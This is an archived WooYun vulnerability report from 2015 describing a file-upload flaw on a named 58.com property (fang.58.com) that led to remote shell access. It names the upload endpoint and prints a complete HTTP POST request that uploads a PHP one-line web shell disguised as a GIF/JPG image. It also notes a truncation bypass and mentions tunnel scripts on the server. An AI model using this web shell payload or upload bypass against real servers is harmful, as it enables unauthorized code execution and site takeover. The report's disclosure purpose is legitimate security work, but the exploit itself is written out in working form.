当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139350

漏洞标题:58某线上业务再次GETSHELL

相关厂商:58同城

漏洞作者: 爱上平顶山

提交时间:2015-09-06 17:17

修复时间:2015-10-21 17:44

公开时间:2015-10-21 17:44

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-06: 细节已通知厂商并且等待厂商处理中
2015-09-06: 厂商已经确认,细节仅向厂商公开
2015-09-16: 细节向核心白帽子及相关领域专家公开
2015-09-26: 细节向普通白帽子公开
2015-10-06: 细节向实习白帽子公开
2015-10-21: 细节向公众公开

简要描述:

2333

详细说明:

58某线上业务再次GETSHELL
http://fang.58.com/
http://fang.58.com/ajax/upload.php?input=pic1&img=img1 截断 绕过就行了

POST /ajax/upload.php HTTP/1.1
Host: fang.58.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://fang.58.com/ajax/upload.php?input=pic1&img=img1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------19735221724515
Content-Length: 420
-----------------------------19735221724515
Content-Disposition: form-data; name="file"; filename="2php.jpg"
Content-Type: image/jpeg
Gif89a
<?php @eval($_POST['x']);?>
-----------------------------19735221724515
Content-Disposition: form-data; name="input"
pic1
-----------------------------19735221724515
Content-Disposition: form-data; name="img"
img1
-----------------------------19735221724515--


0.jpg


1.jpg


23.jpg


33.jpg


4.jpg


3.jpg


把tunnel脚本都删了吧。
ok 就这样

漏洞证明:

···

修复方案:

过滤或者关闭

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-06 17:43

厂商回复:

这个漏洞25号的时候已经有其它白帽子通过wooyun提交过了,我们的漏洞状态还是厂商正在处理中。
按理说这个漏洞wooyun审核的时候应该是审核不通过的,既然提交上来了,就给10rank,希望小伙伴理解!

最新状态:

暂无